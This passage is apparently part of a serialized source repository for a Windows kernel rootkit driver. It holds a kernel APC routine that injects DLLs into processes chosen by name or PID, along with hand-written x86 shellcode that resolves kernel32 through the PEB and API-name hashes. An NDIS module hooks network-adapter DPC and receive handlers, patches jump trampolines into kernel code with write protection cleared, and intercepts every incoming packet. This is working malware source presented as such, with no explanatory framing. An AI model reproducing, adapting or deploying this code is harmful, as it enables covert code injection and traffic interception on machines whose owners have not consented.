(KeInsertQueueApc(&Apc, NULL, NULL, 0))\r\n {\r\n LARGE_INTEGER Timeout;\r\n Timeout.QuadPart = TIME_RELATIVE(TIME_SECONDS(1)); \r\n\r\n // waiting for APC completion\r\n ns = KeWaitForSingleObject(&m_ApcEvent, Executive, KernelMode, FALSE, &Timeout);\r\n if (ns == STATUS_TIMEOUT)\r\n {\r\n DbgMsg(__FUNCTION__\"(): Error while delivering APC\\n\");\r\n }\r\n else if (NT_SUCCESS(ns))\r\n {\r\n DbgMsg(__FUNCTION__\"(): APC delivered!\\n\");\r\n bRet = TRUE;\r\n }\r\n\r\n // sleep for 1 sec.\r\n KeDelayExecutionThread(KernelMode, FALSE, &Timeout);\r\n }\r\n else\r\n {\r\n DbgMsg(\"KeInsertQueueApc() ERROR\\n\");\r\n } \r\n }\r\n else\r\n {\r\n DbgMsg(\"ZwAllocateVirtualMemory() fails; status: 0x%.8x\\n\", ns);\r\n }\r\n }\r\n __except(EXCEPTION_EXECUTE_HANDLER)\r\n {\r\n DbgMsg(__FUNCTION__\"() EXCEPTION\\n\");\r\n } \r\n } \r\n\r\n KeUnstackDetachProcess(&ApcState);\r\n\r\nclose:\r\n ZwClose(hProcess);\r\n }\r\n else\r\n {\r\n DbgMsg(\"ObOpenObjectByPointer() fails; status: 0x%.8x\\n\", ns);\r\n }\r\n\r\n return bRet;\r\n}\r\n//--------------------------------------------------------------------------------------\r\nBOOLEAN InjectIntoProcessByName(PWSTR ProcessName, PVOID Data, ULONG DataSize)\r\n{\r\n BOOLEAN bRet = FALSE;\r\n PEPROCESS Process = NULL;\r\n PKTHREAD Thread = NULL;\r\n\r\n // lookup for process by name\r\n if (InjectFindProcess(ProcessName, 0, &Thread, &Process))\r\n {\r\n // perform DLL injection\r\n bRet = InjectIntoProcess(Process, Thread, Data, DataSize);\r\n\r\n ObDereferenceObject(Process);\r\n ObDereferenceObject(Thread);\r\n }\r\n else\r\n {\r\n DbgMsg(__FUNCTION__\"() ERROR: Unable to find process \\\"%ws\\\"\\n\", ProcessName);\r\n }\r\n\r\n return bRet;\r\n}\r\n//--------------------------------------------------------------------------------------\r\nBOOLEAN InjectIntoProcessById(ULONG ProcessId, PVOID Data, ULONG DataSize)\r\n{\r\n BOOLEAN bRet = FALSE;\r\n PEPROCESS Process = NULL;\r\n PKTHREAD Thread = NULL;\r\n\r\n // lookup for process by ID\r\n if (InjectFindProcess(NULL, ProcessId, &Thread, &Process))\r\n {\r\n // perform DLL injection\r\n bRet = InjectIntoProcess(Process, Thread, Data, DataSize);\r\n\r\n ObDereferenceObject(Process);\r\n ObDereferenceObject(Thread);\r\n }\r\n else\r\n {\r\n DbgMsg(__FUNCTION__\"() ERROR: Unable to find process PID=%d\\n\", ProcessId);\r\n }\r\n\r\n return bRet;\r\n}\r\n//--------------------------------------------------------------------------------------\r\nBOOLEAN InjectInitialize(void)\r\n{ \r\n RTL_OSVERSIONINFOEXW VersionInformation;\r\n VersionInformation.dwOSVersionInfoSize = sizeof(VersionInformation);\r\n\r\n if (!NT_SUCCESS(RtlGetVersion((PRTL_OSVERSIONINFOW)&VersionInformation)))\r\n {\r\n return FALSE;\r\n }\r\n\r\n if (VersionInformation.dwMajorVersion == 5 && \r\n VersionInformation.dwMinorVersion == 1)\r\n {\r\n // XP\r\n SDT_NtProtectVirtualMemory = 0x0089;\r\n\r\n#ifdef _X86_\r\n\r\n m_KTHREAD_ApcState = 0x34;\r\n#endif\r\n\r\n }\r\n else if (\r\n VersionInformation.dwMajorVersion == 5 && \r\n VersionInformation.dwMinorVersion == 2)\r\n {\r\n // Server 2003\r\n SDT_NtProtectVirtualMemory = 0x008f;\r\n\r\n#ifdef _X86_\r\n\r\n m_KTHREAD_ApcState = 0x28;\r\n#endif\r\n if (VersionInformation.wServicePackMajor == 0 &&\r\n VersionInformation.wServicePackMinor == 0)\r\n {\r\n // Service Pack 0, special case\r\n#ifdef _X86_\r\n\r\n m_KTHREAD_ApcState = 0x34;\r\n#endif\r\n }\r\n }\r\n else if (\r\n VersionInformation.dwMajorVersion == 6 && \r\n VersionInformation.dwMinorVersion == 0)\r\n {\r\n // Vista\r\n if (VersionInformation.wServicePackMajor == 0 &&\r\n VersionInformation.wServicePackMinor == 0)\r\n {\r\n // Service Pack 0, special case\r\n SDT_NtProtectVirtualMemory = 0x00cf;\r\n }\r\n else\r\n {\r\n SDT_NtProtectVirtualMemory = 0x00d2;\r\n }\r\n\r\n#ifdef _X86_\r\n\r\n m_KTHREAD_ApcState = 0x38;\r\n#endif\r\n\r\n }\r\n else if (\r\n VersionInformation.dwMajorVersion == 6 && \r\n VersionInformation.dwMinorVersion == 1)\r\n {\r\n // 7\r\n SDT_NtProtectVirtualMemory = 0x00d7;\r\n\r\n#ifdef _X86_\r\n\r\n m_KTHREAD_ApcState = 0x40;\r\n#endif\r\n\r\n }\r\n else\r\n {\r\n DbgMsg(__FUNCTION__\"() ERROR: Unknown NT version\\n\");\r\n return FALSE;\r\n }\r\n\r\n DbgMsg(\"NtProtectVirtualMemory() SDT number is 0x%x\\n\", SDT_NtProtectVirtualMemory); \r\n\r\n KeInitializeEvent(&m_ApcEvent, SynchronizationEvent, FALSE);\r\n\r\n return TRUE;\r\n}\r\n//--------------------------------------------------------------------------------------\r\n// EoF\r\n" }, { "path": "src/rootkit_driver/dll_inject.h", "content": "\r\n\r\n#ifdef _X86_\r\n\r\n#define PEB_IMAGE_BASE_OFFEST 0x08\r\n\r\n#elif _AMD64_\r\n\r\n#define PEB_IMAGE_BASE_OFFEST 0x10\r\n\r\n#endif\r\n\r\n/**\r\n * Callgate for execution library with CreateRemoteThread()\r\n */\r\n#pragma pack(1)\r\ntypedef struct _INJ_THREAD_STRUCT\r\n{\r\n // push ModuleBase\r\n UCHAR u0_0x68;\r\n ULONG Image;\r\n\r\n // call ProcessModuleImports\r\n UCHAR u1_0xE8;\r\n ULONG ShellCodeAddr;\r\n \r\n // test eax,eax\r\n USHORT u2_0xC085;\r\n\r\n // jz exit\r\n USHORT u3_0x840F;\r\n ULONG ExitAddr;\r\n\r\n // push param_1\r\n UCHAR u4_0x68;\r\n ULONG param_Reserved;\r\n \r\n // push param_2\r\n UCHAR u5_0x68;\r\n ULONG param_Reason;\r\n \r\n // push param_3\r\n UCHAR u6_0x68;\r\n ULONG ModuleInstance;\r\n \r\n // call ImageEntryPoint\r\n UCHAR u7_0xE8;\r\n ULONG ImageEntryPoint; \r\n\r\n // retn 3\r\n UCHAR u8_0xC2;\r\n USHORT param_local_size;\r\n\r\n UCHAR ShellCode[];\r\n\r\n} INJ_THREAD_STRUCT,\r\n*PINJ_THREAD_STRUCT;\r\n#pragma pack()\r\n\r\nNTSTATUS NTAPI _ZwProtectVirtualMemory(\r\n HANDLE ProcessHandle,\r\n PVOID *BaseAddress,\r\n PSIZE_T NumberOfBytesToProtect,\r\n ULONG NewAccessProtection,\r\n PULONG OldAccessProtection\r\n);\r\n\r\n\r\nBOOLEAN InjectInitialize(void);\r\nBOOLEAN InjectIntoProcess(PEPROCESS Process, PKTHREAD Thread, PVOID Data, ULONG DataSize);\r\nBOOLEAN InjectIntoProcessByName(PWSTR ProcessName, PVOID Data, ULONG DataSize);\r\nBOOLEAN InjectIntoProcessById(ULONG ProcessId, PVOID Data, ULONG DataSize);\r\n\r\n" }, { "path": "src/rootkit_driver/dll_inject_shellcode.h", "content": "#define EMIT(_data_) __asm __emit _data_\r\n#define _ __asm __emit \r\n\r\n#define h_LoadLibraryA 0xA412FD89 \r\n#define h_GetProcAddress 0xF2509B84\r\n\r\n#define h_LoadLibraryExA 0x04BF60E8\r\n\r\n#define ENDM 'DNE~' \r\n\r\n/**\r\n* Shellcode for setting up library imports\r\n*/\r\n__declspec(naked) ULONG __stdcall inj_shellcode(PVOID Addr)\r\n{\r\n ULONG fLoadLibraryA, fGetProcAddress, bRet;\r\n\r\n __asm\r\n {\r\n push ebp\r\n mov ebp, esp\r\n sub esp, __LOCAL_SIZE\r\n\r\n pushad\r\n\r\n call _realloc\r\n\r\n_realloc:\r\n\r\n // calculate shellcode address\r\n pop ebx\r\n sub ebx, _realloc \r\n\r\n call _get_kernel_32\r\n mov esi, eax\r\n\r\n push h_LoadLibraryExA\r\n push esi\r\n call _get_proc_addr\r\n\r\n // get address of KERNEL32.DLL\r\n push 0\r\n push 0\r\n lea ecx, [ebx + _kernel32_name]\r\n push ecx\r\n call eax\r\n mov esi, eax\r\n\r\n push h_LoadLibraryA\r\n push esi\r\n call _get_proc_addr\r\n mov fLoadLibraryA, eax \r\n\r\n push h_GetProcAddress\r\n push esi\r\n call _get_proc_addr\r\n mov fGetProcAddress, eax\r\n\r\n push fGetProcAddress\r\n push fLoadLibraryA\r\n mov eax, [ebp + 8]\r\n push eax\r\n call _process_imports\r\n mov bRet, eax\r\n\r\n popad\r\n\r\n mov eax, bRet\r\n\r\n mov esp, ebp\r\n pop ebp\r\n retn 0x04\r\n\r\n_calc_hash:\r\n push ebp\r\n mov ebp, esp\r\n mov eax, [ebp + 8]\r\n push edx\r\n xor edx, edx\r\n\r\n_calc_hash_next:\r\n rol edx, 3\r\n xor dl, [eax]\r\n inc eax\r\n cmp [eax], 0\r\n jnz _calc_hash_next\r\n mov eax, edx\r\n pop edx\r\n pop ebp\r\n retn 4\r\n\r\n_get_kernel_32:\r\n push esi\r\n xor eax, eax\r\n mov eax, fs:[0x30]\r\n js _find_kernel_9x\r\n mov eax, [eax + 0x0c]\r\n mov esi, [eax + 0x1c]\r\n lodsd\r\n mov eax, [eax + 0x8]\r\n jmp _find_kernel_end\r\n\r\n_find_kernel_9x:\r\n mov eax, [eax + 0x34]\r\n lea eax, [eax + 0x7c]\r\n mov eax, [eax + 0x3c]\r\n\r\n_find_kernel_end:\r\n pop esi\r\n ret\r\n\r\n_get_proc_addr:\r\n push ebp\r\n mov ebp, esp\r\n push ebx\r\n push esi\r\n push edi\r\n xor eax, eax\r\n mov ebx, [ebp + 0Ch]\r\n mov esi, [ebp + 8]\r\n mov edi, esi\r\n add esi, [esi + 3Ch]\r\n mov ecx, [esi + 78h]\r\n add ecx, edi\r\n mov edx, [ecx + 1ch]\r\n push edx\r\n mov edx, [ecx + 24h]\r\n push edx\r\n mov esi, [ecx + 20h]\r\n add esi, edi\r\n cdq\r\n dec edx\r\n\r\n_next_func: \r\n lodsd\r\n inc edx\r\n add eax, [ebp + 8]\r\n push eax\r\n call _calc_hash\r\n cmp eax, ebx\r\n jnz _next_func\r\n mov eax, [ebp + 8]\r\n xchg eax, edx\r\n pop esi\r\n add esi, edx\r\n shl eax, 1\r\n add eax, esi\r\n xor ecx, ecx\r\n movzx ecx, word ptr [eax]\r\n pop edi\r\n shl ecx, 2\r\n add ecx, edx\r\n add ecx, edi\r\n mov eax, [ecx]\r\n add eax, edx\r\n pop edi\r\n pop esi\r\n pop ebx\r\n pop ebp\r\n retn 8\r\n\r\n_process_imports:\r\n push ebp\r\n mov ebp, esp\r\n sub esp, 0x10\r\n push ebx\r\n mov ebx, [ebp + 8]\r\n test ebx, ebx\r\n push esi\r\n push edi\r\n je _l067\r\n mov eax, [ebx + 0x3c]\r\n mov edi, [eax + ebx + 0x80]\r\n add edi, ebx\r\n jmp _l058\r\n_l013:\r\n mov eax, [edi + 0xc]\r\n add eax, ebx\r\n mov [ebp - 4], eax\r\n push [ebp - 4]\r\n call [ebp + 0x0c]\r\n mov [ebp + 8], eax\r\n cmp dword ptr [ebp + 8], 0\r\n je _l067\r\n cmp dword ptr [edi + 4], -1\r\n jnz _l025\r\n mov eax, [edi]\r\n jmp _l026\r\n_l025:\r\n mov eax, [edi + 0x10]\r\n_l026:\r\n mov [ebp - 4], eax\r\n lea esi,[eax + ebx]\r\n jmp _l055\r\n_l029:\r\n mov eax, [esi]\r\n test eax, 0xf0000000\r\n je _l040\r\n and eax, 0x0ffff\r\n mov [ebp - 8], eax\r\n push [ebp - 8]\r\n push [ebp + 8]\r\n call [ebp + 0x10]\r\n mov [ebp - 0x0c], eax\r\n mov eax, [ebp - 0x0c]\r\n jmp _l047\r\n_l040:\r\n lea eax, [eax + ebx + 2]\r\n mov [ebp - 8], eax\r\n push [ebp - 8]\r\n push [ebp + 8]\r\n call [ebp + 0x10]\r\n mov [ebp - 0x10], eax\r\n mov eax, [ebp - 0x10]\r\n_l047:\r\n test eax, eax\r\n mov [esi], eax\r\n je _l067\r\n mov eax, [edi + 0x10]\r\n sub eax, [ebp - 4]\r\n mov ecx, [esi]\r\n mov [eax + esi], ecx\r\n add esi, 4\r\n_l055:\r\n cmp dword ptr [esi], 0\r\n jnz _l029\r\n add edi, 0x14\r\n_l058:\r\n cmp dword ptr [edi], 0\r\n jnz _l013\r\n xor eax, eax\r\n inc eax\r\n_l062:\r\n pop edi\r\n pop esi\r\n pop ebx\r\n leave\r\n retn 0x0c\r\n_l067:\r\n xor eax, eax\r\n jmp _l062\r\n\r\n_kernel32_name:\r\n\r\n EMIT('k' _ 'e' _ 'r' _ 'n' _ 'e' _ 'l' _ '3' _ '2' _ 0)\r\n }\r\n\r\n // shellcode's end marker\r\n EMIT('~' _ 'E' _ 'N' _ 'D') \r\n}\r\n" }, { "path": "src/rootkit_driver/ndis_hook.cpp", "content": "#include \"stdafx.h\"\r\n\r\n// NDIS version: 6.0\r\n#define NDIS60 1\r\n\r\nextern \"C\"\r\n{\r\n#include \r\n}\r\n\r\n\r\n#include \"bogusproto.h\"\r\n\r\n#pragma alloc_text(INIT, NdisHookProtocolFind)\r\n#pragma alloc_text(INIT, NdisHookProtocolEnumOpened)\r\n#pragma alloc_text(INIT, NdisHookOpenGetMiniport)\r\n#pragma alloc_text(INIT, NdisHookAllocJump)\r\n#pragma alloc_text(INIT, NdisHookSet)\r\n\r\n// field offsets for NDIS structures\r\nint NDIS_PROTOCOL_BLOCK_Name = -1,\r\n NDIS_PROTOCOL_BLOCK_OpenQueue = -1,\r\n NDIS_PROTOCOL_BLOCK_NextProtocol = -1,\r\n NDIS_OPEN_BLOCK_ProtocolNextOpen = -1, \r\n NDIS_OPEN_BLOCK_MiniportHandle = -1, \r\n NDIS_MINIPORT_BLOCK_InterruptEx = -1,\r\n NDIS_MINIPORT_BLOCK_IndicateNetBufferListsHandler = -1,\r\n NDIS_INTERRUPT_BLOCK_MiniportDpc = -1;\r\n\r\nNDIS_HOOK_BUFFER_HANDLER m_Handler = NULL;\r\n//--------------------------------------------------------------------------------------\r\nBOOLEAN NdisHookInitialize(NDIS_HOOK_BUFFER_HANDLER Handler)\r\n{\r\n UINT NdisVersion = NdisGetVersion();\r\n if (NdisVersion != 0x60014)\r\n {\r\n DbgMsg(__FUNCTION__\"() ERROR: NDIS version 0x%x is not supported\\n\", NdisVersion);\r\n return FALSE;\r\n }\r\n\r\n m_Handler = Handler;\r\n\r\n#ifdef _X86_\r\n\r\n NDIS_PROTOCOL_BLOCK_OpenQueue = 0x00c;\r\n NDIS_PROTOCOL_BLOCK_NextProtocol = 0x008;\r\n NDIS_PROTOCOL_BLOCK_Name = 0x024;\r\n NDIS_OPEN_BLOCK_ProtocolNextOpen = 0x0dc;\r\n NDIS_OPEN_BLOCK_MiniportHandle = 0x008;\r\n NDIS_MINIPORT_BLOCK_InterruptEx = 0x1c0;\r\n NDIS_MINIPORT_BLOCK_IndicateNetBufferListsHandler = 0x19c;\r\n NDIS_INTERRUPT_BLOCK_MiniportDpc = 0x010;\r\n\r\n#endif\r\n\r\n return TRUE;\r\n}\r\n//--------------------------------------------------------------------------------------\r\nPVOID NdisHookProtocolFind(PVOID hBogusProtocol, PUNICODE_STRING usProtocol)\r\n{ \r\n\r\n#ifdef USE_PARANOID_CHEKS\r\n\r\n if (NDIS_PROTOCOL_BLOCK_Name < 0 ||\r\n NDIS_PROTOCOL_BLOCK_NextProtocol < 0)\r\n {\r\n DbgMsg(__FUNCTION__\"() ERROR: Some offsets are not initialized\\n\");\r\n return NULL;\r\n }\r\n\r\n#endif // USE_PARANOID_CHEKS\r\n\r\n PUCHAR Protocol = (PUCHAR)hBogusProtocol;\r\n\r\n // enumerate registered NDIS protocols\r\n while (Protocol)\r\n {\r\n PUNICODE_STRING ProtocolName = (PUNICODE_STRING)(Protocol + NDIS_PROTOCOL_BLOCK_Name);\r\n\r\n // find TCPIP protocol\r\n if (RtlEqualUnicodeString(ProtocolName, usProtocol, TRUE))\r\n { \r\n return Protocol;\r\n }\r\n\r\n Protocol = *(PUCHAR *)(Protocol + NDIS_PROTOCOL_BLOCK_NextProtocol);\r\n } \r\n\r\n return NULL;\r\n}\r\n//--------------------------------------------------------------------------------------\r\nPVOID NdisHookProtocolEnumOpened(PVOID Protocol, PVOID OpenBlock)\r\n{\r\n\r\n#ifdef USE_PARANOID_CHEKS\r\n\r\n if (NDIS_PROTOCOL_BLOCK_OpenQueue < 0 || \r\n NDIS_OPEN_BLOCK_ProtocolNextOpen < 0)\r\n {\r\n DbgMsg(__FUNCTION__\"() ERROR: Some offsets are not initialized\\n\");\r\n return NULL;\r\n }\r\n\r\n#endif // USE_PARANOID_CHEKS\r\n\r\n if (OpenBlock)\r\n {\r\n return *(PVOID *)((PUCHAR)OpenBlock + NDIS_OPEN_BLOCK_ProtocolNextOpen); \r\n }\r\n else\r\n {\r\n return *(PVOID *)((PUCHAR)Protocol + NDIS_PROTOCOL_BLOCK_OpenQueue);\r\n }\r\n\r\n return NULL;\r\n}\r\n//--------------------------------------------------------------------------------------\r\nPVOID NdisHookOpenGetMiniport(PVOID OpenBlock)\r\n{\r\n\r\n#ifdef USE_PARANOID_CHEKS\r\n\r\n if (NDIS_OPEN_BLOCK_MiniportHandle < 0)\r\n {\r\n DbgMsg(__FUNCTION__\"() ERROR: Some offsets are not initialized\\n\");\r\n return NULL;\r\n }\r\n\r\n#endif // USE_PARANOID_CHEKS\r\n\r\n return *(PVOID *)((PUCHAR)OpenBlock + NDIS_OPEN_BLOCK_MiniportHandle);\r\n}\r\n//--------------------------------------------------------------------------------------\r\nNDIS_STATUS CopyNBLToBuffer(PNET_BUFFER_LIST NetBufferList, PVOID *pDest, PULONG pBytesCopied) \r\n{\r\n NDIS_STATUS Status = NDIS_STATUS_SUCCESS;\r\n PNET_BUFFER CurrentNetBuffer;\r\n\r\n __try\r\n {\r\n *pBytesCopied = 0;\r\n\r\n for (CurrentNetBuffer = NET_BUFFER_LIST_FIRST_NB(NetBufferList);\r\n CurrentNetBuffer != NULL;\r\n CurrentNetBuffer = NET_BUFFER_NEXT_NB(CurrentNetBuffer))\r\n {\r\n PMDL CurrentMdl = NET_BUFFER_CURRENT_MDL(CurrentNetBuffer);\r\n PUCHAR pSrc = (PUCHAR)MmGetSystemAddressForMdlSafe(CurrentMdl, NormalPagePriority);\r\n if (pSrc == NULL)\r\n {\r\n if (*pDest && *pBytesCopied > 0)\r\n {\r\n ExFreePool(*pDest);\r\n }\r\n\r\n Status = NDIS_STATUS_RESOURCES;\r\n __leave;\r\n }\r\n\r\n // For the first MDL with data, we need to skip the free space\r\n pSrc += NET_BUFFER_CURRENT_MDL_OFFSET(CurrentNetBuffer);\r\n\r\n LONG CurrLength = MmGetMdlByteCount(CurrentMdl) - NET_BUFFER_CURRENT_MDL_OFFSET(CurrentNetBuffer);\r\n if (CurrLength > 0)\r\n {\r\n ULONG CopyLegth = *pBytesCopied + CurrLength;\r\n PUCHAR CopyBuff = (PUCHAR)ExAllocatePool(NonPagedPool, CopyLegth);\r\n if (CopyBuff)\r\n {\r\n if (*pDest && *pBytesCopied > 0)\r\n {\r\n RtlCopyMemory(CopyBuff, *pDest, *pBytesCopied);\r\n ExFreePool(*pDest);\r\n }\r\n\r\n // Copy the data.\r\n NdisMoveMemory(CopyBuff + *pBytesCopied, pSrc, CurrLength);\r\n *pDest = CopyBuff;\r\n } \r\n else\r\n {\r\n if (*pDest && *pBytesCopied > 0)\r\n {\r\n ExFreePool(*pDest);\r\n }\r\n\r\n Status = NDIS_STATUS_RESOURCES;\r\n __leave;\r\n }\r\n\r\n *pBytesCopied += CurrLength;\r\n pDest += CurrLength;\r\n }\r\n\r\n CurrentMdl = NDIS_MDL_LINKAGE(CurrentMdl);\r\n while (CurrentMdl)\r\n {\r\n pSrc = (PUCHAR)MmGetSystemAddressForMdlSafe(CurrentMdl, NormalPagePriority);\r\n if (!pSrc)\r\n {\r\n if (*pDest && *pBytesCopied > 0)\r\n {\r\n ExFreePool(*pDest);\r\n }\r\n\r\n Status = NDIS_STATUS_RESOURCES;\r\n __leave;\r\n }\r\n\r\n CurrLength = MmGetMdlByteCount(CurrentMdl);\r\n\r\n if (CurrLength > 0)\r\n {\r\n ULONG CopyLegth = *pBytesCopied + CurrLength;\r\n PUCHAR CopyBuff = (PUCHAR)ExAllocatePool(NonPagedPool, CopyLegth);\r\n if (CopyBuff)\r\n {\r\n if (*pDest && *pBytesCopied > 0)\r\n {\r\n RtlCopyMemory(CopyBuff, *pDest, *pBytesCopied);\r\n ExFreePool(*pDest);\r\n }\r\n\r\n // Copy the data.\r\n NdisMoveMemory(CopyBuff + *pBytesCopied, pSrc, CurrLength);\r\n *pDest = CopyBuff;\r\n } \r\n else\r\n {\r\n if (*pDest && *pBytesCopied > 0)\r\n {\r\n ExFreePool(*pDest);\r\n }\r\n\r\n Status = NDIS_STATUS_RESOURCES;\r\n __leave;\r\n }\r\n\r\n *pBytesCopied += CurrLength;\r\n pDest += CurrLength;\r\n }\r\n\r\n CurrentMdl = NDIS_MDL_LINKAGE(CurrentMdl);\r\n }\r\n }\r\n }\r\n __finally { }\r\n\r\n return Status;\r\n}\r\n//--------------------------------------------------------------------------------------\r\n#ifdef _X86_\r\n\r\n#pragma pack(push, 1)\r\ntypedef struct _HOOK_STRUCT\r\n{\r\n UCHAR op1_0x58; /* POP EAX */\r\n \r\n UCHAR op2_0x68; /* PUSH OldHandler */\r\n PVOID OldHandler;\r\n\r\n UCHAR op3_0x68; /* PUSH OldHandlerContext */\r\n PVOID OldHandlerContext;\r\n\r\n UCHAR op4_0x50; /* PUSH EAX */\r\n \r\n UCHAR op5_0x68; /* PUSH Handler */\r\n PVOID Handler;\r\n\r\n UCHAR op6_0xc3; /* RET */\r\n\r\n} HOOK_STRUCT,\r\n*PHOOK_STRUCT;\r\n#pragma pack(pop)\r\n\r\nPVOID NdisHookAlloc(PVOID OldHandler, PVOID OldHandlerContext, PVOID Handler)\r\n{\r\n // allocate trampoline for hook handler calling\r\n PHOOK_STRUCT HookStruct = (PHOOK_STRUCT)ExAllocatePool(NonPagedPool, sizeof(HOOK_STRUCT));\r\n if (HookStruct)\r\n {\r\n HookStruct->op1_0x58 = 0x58;\r\n HookStruct->op2_0x68 = 0x68;\r\n HookStruct->OldHandler = OldHandler;\r\n HookStruct->op3_0x68 = 0x68;\r\n HookStruct->OldHandlerContext = OldHandlerContext;\r\n HookStruct->op4_0x50 = 0x50;\r\n HookStruct->op5_0x68 = 0x68;\r\n HookStruct->Handler = Handler;\r\n HookStruct->op6_0xc3 = 0xc3;\r\n }\r\n\r\n return HookStruct;\r\n}\r\n\r\n#endif // _X86_\r\n//--------------------------------------------------------------------------------------\r\n#define JUMP_SIZE 6\r\n\r\nPVOID NdisHookAllocJump(PVOID Address, PVOID Destination)\r\n{\r\n PVOID Image = NULL;\r\n\r\n PRTL_PROCESS_MODULES Info = (PRTL_PROCESS_MODULES)RuntimeGetSystemInformation(SystemModuleInformation);\r\n if (Info)\r\n {\r\n for (ULONG i = 0; i < Info->NumberOfModules; i++)\r\n {\r\n // find image by address inside it\r\n if (Address > Info->Modules[i].ImageBase &&\r\n Address < (PUCHAR)Info->Modules[i].ImageBase + Info->Modules[i].ImageSize)\r\n {\r\n Image = Info->Modules[i].ImageBase;\r\n break;\r\n }\r\n }\r\n\r\n ExFreePool(Info);\r\n }\r\n\r\n if (Image == NULL)\r\n {\r\n // unknown address\r\n return Destination;\r\n }\r\n\r\n PIMAGE_NT_HEADERS pHeaders = (PIMAGE_NT_HEADERS)\r\n ((PUCHAR)Image + ((PIMAGE_DOS_HEADER)Image)->e_lfanew);\r\n\r\n PIMAGE_SECTION_HEADER pSection = (PIMAGE_SECTION_HEADER)\r\n (pHeaders->FileHeader.SizeOfOptionalHeader + \r\n (PUCHAR)&pHeaders->OptionalHeader);\r\n\r\n UCHAR ZeroBytes[JUMP_SIZE];\r\n RtlZeroMemory(ZeroBytes, sizeof(ZeroBytes));\r\n\r\n // find the '.text' section\r\n for (ULONG i = 0; i < pHeaders->FileHeader.NumberOfSections; i++, pSection++)\r\n { \r\n if (!strcmp((char *)&pSection->Name, \".text\") &&\r\n (pSection->Characteristics & IMAGE_SCN_MEM_EXECUTE) &&\r\n !(pSection->Characteristics & IMAGE_SCN_MEM_DISCARDABLE))\r\n {\r\n // calculate the real size of section \r\n ULONG RealSize = MY_ALIGN_UP(pSection->Misc.VirtualSize, pHeaders->OptionalHeader.SectionAlignment);\r\n ULONG PaddingSize = RealSize - pSection->Misc.VirtualSize;\r\n if (PaddingSize > JUMP_SIZE)\r\n {\r\n // find section padding\r\n PUCHAR Padding = RVATOVA(Image, pSection->VirtualAddress + pSection->Misc.VirtualSize);\r\n\r\n for (ULONG p = PaddingSize - JUMP_SIZE; p != 0; p--)\r\n {\r\n PUCHAR Ptr = Padding + p;\r\n\r\n // check for zero bytes\r\n if (RtlCompareMemory(Ptr, ZeroBytes, JUMP_SIZE) == JUMP_SIZE)\r\n { \r\n ClearWp();\r\n#ifdef _X86_\r\n // allocate jump\r\n *(Ptr + 0) = 0x68; /* PUSH Destination */\r\n *(PVOID *)(Ptr + 1) = Destination;\r\n *(Ptr + 1 + sizeof(PVOID)) = 0xc3; /* RET */\r\n#else // _X86_\r\n\r\n#error __FUNCTION__ is x86 only\r\n\r\n#endif // _X86_\r\n SetWp();\r\n\r\n return Ptr;\r\n }\r\n }\r\n }\r\n }\r\n }\r\n\r\n return Destination;\r\n}\r\n//--------------------------------------------------------------------------------------\r\ntypedef void (NTAPI * func_IndicateNetBufferListsHandler)(\r\n NDIS_HANDLE MiniportAdapterHandle,\r\n PNET_BUFFER_LIST NetBufferLists,\r\n NDIS_PORT_NUMBER PortNumber,\r\n ULONG NumberOfNetBufferLists,\r\n ULONG ReceiveFlags\r\n);\r\n\r\nvoid IndicateNetBufferListsHandler(\r\n /***/\r\n PVOID Reserved,\r\n func_IndicateNetBufferListsHandler OldHandler,\r\n /***/\r\n NDIS_HANDLE MiniportAdapterHandle,\r\n PNET_BUFFER_LIST NetBufferLists,\r\n NDIS_PORT_NUMBER PortNumber,\r\n ULONG NumberOfNetBufferLists,\r\n ULONG ReceiveFlags)\r\n{ \r\n // iterate NET_BUFFER_LIST\r\n PNET_BUFFER_LIST BufferList = NetBufferLists;\r\n while (BufferList)\r\n {\r\n PVOID Buff = NULL;\r\n ULONG BuffSize = 0;\r\n\r\n // get raw buffers data\r\n if (CopyNBLToBuffer(BufferList, &Buff, &BuffSize) == NDIS_STATUS_SUCCESS)\r\n {\r\n\r\n#ifdef DBG_NDIS_HOOK\r\n\r\n DbgMsg(__FUNCTION__\"(): Miniport = \"IFMT\", Length = %d\\n\", MiniportAdapterHandle, BuffSize);\r\n#endif\r\n if (m_Handler)\r\n {\r\n // call the data handler\r\n m_Handler(MiniportAdapterHandle, Buff, BuffSize);\r\n }\r\n\r\n ExFreePool(Buff);\r\n }\r\n\r\n BufferList = NET_BUFFER_LIST_NEXT_NBL(BufferList);\r\n } \r\n\r\n // call original function\r\n OldHandler(\r\n MiniportAdapterHandle,\r\n NetBufferLists,\r\n PortNumber,\r\n NumberOfNetBufferLists,\r\n ReceiveFlags \r\n );\r\n}\r\n\r\ntypedef void (NTAPI * func_MiniportInterruptDPC)(\r\n NDIS_HANDLE MiniportInterruptContext,\r\n PVOID MiniportDpcContext,\r\n PVOID ReceiveThrottleParameters,\r\n PVOID NdisReserved2\r\n);\r\n\r\nvoid MiniportInterruptDPC(\r\n /***/\r\n PVOID Miniport,\r\n func_MiniportInterruptDPC OldHandler,\r\n /***/\r\n NDIS_HANDLE MiniportInterruptContext,\r\n PVOID MiniportDpcContext,\r\n PVOID ReceiveThrottleParameters,\r\n PVOID NdisReserved2)\r\n{\r\n PVOID Handler = *(PVOID *)((PUCHAR)Miniport + NDIS_MINIPORT_BLOCK_IndicateNetBufferListsHandler);\r\n\r\n#ifdef DBG_NDIS_HOOK\r\n\r\n DbgMsg(__FUNCTION__\"(): Miniport = \"IFMT\"\\n\", Miniport);\r\n\r\n#endif\r\n\r\n // allocate trampoline for hook handler calling\r\n PVOID HookStruct = NdisHookAlloc(Handler, NULL, IndicateNetBufferListsHandler);\r\n if (HookStruct)\r\n {\r\n // hook _NDIS_MINIPORT_BLOCK::IndicateNetBufferListsHandler\r\n *(PVOID *)((PUCHAR)Miniport + NDIS_MINIPORT_BLOCK_IndicateNetBufferListsHandler) = HookStruct;\r\n }\r\n\r\n // call original function\r\n OldHandler(\r\n MiniportInterruptContext,\r\n MiniportDpcContext,\r\n ReceiveThrottleParameters,\r\n NdisReserved2\r\n );\r\n\r\n if (HookStruct)\r\n {\r\n // restore _NDIS_MINIPORT_BLOCK::IndicateNetBufferListsHandler\r\n *(PVOID *)((PUCHAR)Miniport + NDIS_MINIPORT_BLOCK_IndicateNetBufferListsHandler) = Handler;\r\n ExFreePool(HookStruct);\r\n }\r\n}\r\n//--------------------------------------------------------------------------------------\r\nULONG NdisHookSet(PUCHAR PointerFixup)\r\n{\r\n\r\n#ifdef USE_PARANOID_CHEKS\r\n\r\n if (NDIS_MINIPORT_BLOCK_InterruptEx < 0 || \r\n NDIS_INTERRUPT_BLOCK_MiniportDpc < 0 ||\r\n NDIS_MINIPORT_BLOCK_IndicateNetBufferListsHandler < 0)\r\n {\r\n 